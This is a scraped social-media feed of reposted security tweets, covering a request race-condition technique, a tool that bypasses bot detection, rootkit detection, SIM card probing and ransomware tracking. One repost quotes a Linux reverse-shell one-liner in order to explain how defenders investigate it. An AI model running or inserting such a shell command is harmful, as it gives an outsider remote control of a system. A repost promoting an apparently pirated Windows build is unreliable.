cybsec_oon's profile picture.

bestioon

@cybsec_oon

bestioon reposted

Border agent guy: Ma'am is this your laptop? me: yes, can I have it back please agent guy: It shows as suspicious. Can you turn it on? me: uh... no. I removed the battery agent guy: Why? me: oh because it was going to explode i have never seen a man become so alert so quickly

twitter how explodey do we think this is?

thingskatedid's tweet image. twitter how explodey do we think this is?


bestioon reposted

I recently developed and posted about a technique called "First sequence sync", expanding @albinowax's single packet attack. This technique allowed me to send 10,000 requests in 166ms, which breaks the packet size limitation of the single packet attack. flatt.tech/research/posts…


bestioon reposted

.@SinSinology dropped some great tips for anyone struggling to stay motivated and wanted to share them with y'all. Here they are: 1. Get the reps in, you can’t avoid this part (continued in thread).

ctbbpodcast's tweet image. .@SinSinology dropped some great tips for anyone struggling to stay motivated and wanted to share them with y'all.

Here they are:

1. Get the reps in, you can’t avoid this part

(continued in thread).

bestioon reposted

Introducing Bypass Bot Detection, a new @Burp_Suite extension that helps you bypass TLS fingerprinting by mimicking browser fingerprints and brute-forcing protocol/cipher combinations. github.com/PortSwigger/by…


bestioon reposted

Every week nerds ask us "do you know {ransomware_groups} onion?". Every ransomware group's domains are archived, past and present, as well as their post history by @joshhighet on his website ransomwatch telemetry. Now stop asking us >:( Link: ransomwatch.telemetry.ltd


bestioon reposted

Here is Windows Government edition. Version of Windows maximally debloated by Microsoft, with all telemetry and microsoft apps removed and without restrictions for hardware present in Retail version

Pirat_Nation's tweet image. Here is Windows Government edition. Version of Windows maximally debloated by Microsoft, with all telemetry and microsoft apps removed and without restrictions for hardware present in Retail version
Pirat_Nation's tweet image. Here is Windows Government edition. Version of Windows maximally debloated by Microsoft, with all telemetry and microsoft apps removed and without restrictions for hardware present in Retail version
Pirat_Nation's tweet image. Here is Windows Government edition. Version of Windows maximally debloated by Microsoft, with all telemetry and microsoft apps removed and without restrictions for hardware present in Retail version
Pirat_Nation's tweet image. Here is Windows Government edition. Version of Windows maximally debloated by Microsoft, with all telemetry and microsoft apps removed and without restrictions for hardware present in Retail version

bestioon reposted

Detecting stealth rootkits on Linux can be done from the command line. The secret is to ask the same question multiple ways to make sure all answers agree. Let's find a directory from the Reptile stealth rootkit on Linux with link checks. h/t @hal_pomeranz for this method.

CraigHRowland's tweet image. Detecting stealth rootkits on Linux can be done from the command line. The secret is to ask the same question multiple ways to make sure all answers agree.

Let's find a directory from the Reptile stealth rootkit on Linux with link checks.

h/t @hal_pomeranz for this method.

bestioon reposted

Ask A Hacker: "Rachel, is it actually a big deal if I Google my name and my email address or phone number pop up. Why could that matter for someone like me?" It can matter because many services you trust still use knowledge based authentication (KBA -- info like email…


bestioon reposted

One of my favorite reverse shells for Linux is this: bash -i >& /dev/tcp/IP_ADDRESS/PORT 0>&1 It's simple and works on just about every Linux system without elaborate payloads. Let's discuss how to investigate it.

CraigHRowland's tweet image. One of my favorite reverse shells for Linux is this:
 
bash -i >& /dev/tcp/IP_ADDRESS/PORT 0>&1

It's simple and works on just about every Linux system without elaborate payloads. Let's discuss how to investigate it.

bestioon reposted

Mobile phone SIM cards and bank IC cards respond to an asynchronous Answer To Reset command over a half-duplex UART. Pump a continuous clock signal into the clock pin. Bring the reset pin low and then high. The ATR response comes out of the IO pin...

dangerousproto's tweet image. Mobile phone SIM cards and bank IC cards respond to an asynchronous Answer To Reset command over a half-duplex UART. Pump a continuous clock signal into the clock pin. Bring the reset pin low and then high. The ATR response comes out of the IO pin...
dangerousproto's tweet image. Mobile phone SIM cards and bank IC cards respond to an asynchronous Answer To Reset command over a half-duplex UART. Pump a continuous clock signal into the clock pin. Bring the reset pin low and then high. The ATR response comes out of the IO pin...
dangerousproto's tweet image. Mobile phone SIM cards and bank IC cards respond to an asynchronous Answer To Reset command over a half-duplex UART. Pump a continuous clock signal into the clock pin. Bring the reset pin low and then high. The ATR response comes out of the IO pin...

bestioon reposted

This is really a 'WOW' paper. 🤯 Claims that MatMul operations can be completely eliminated from LLMs while maintaining strong performance at billion-parameter scales and by utilizing an optimized kernel during inference, their model’s memory consumption can be reduced by more…

rohanpaul_ai's tweet image. This is really a 'WOW' paper. 🤯

Claims that MatMul operations can be completely eliminated from LLMs while maintaining strong performance at billion-parameter scales and by utilizing an optimized kernel during inference, their model’s memory consumption can be reduced by more…

bestioon reposted
LiveOverflow's tweet image.

Revamped my collection of USB hacking–related links: 🧰 Added more hardware and tools; 🗄 Reorganized into sections; 🗃 Added a table of contents. Enjoy! 🎉 github.com/xairy/usb-hack…



bestioon reposted

Since I'm 6 drinks in for 20 bucks, let me tell you all about the story of how the first Microsoft Office 2007 vulnerability was discovered, or how it wasn't. This was a story I was gonna save for a book but fuck it, I ain't gonna write it anyways.


bestioon reposted

Recorded future do awesome work. They have a nice graph of UK ransomware incidents! TY! On the bottom right is my anecdotal annotation of: things the industry talks about and yet how do these incidents actually work? like how does an org get ransomared? Hint: it's got fuck all…

UK_Daniel_Card's tweet image. Recorded future do awesome work. They have a nice graph of UK ransomware incidents! TY!

On the bottom right is my anecdotal annotation of:
things the industry talks about

and yet how do these incidents actually work? like how does an org get ransomared?

Hint: it's got fuck all…

This account does not have any followers

United States Trends

Loading...

Something went wrong.


Something went wrong.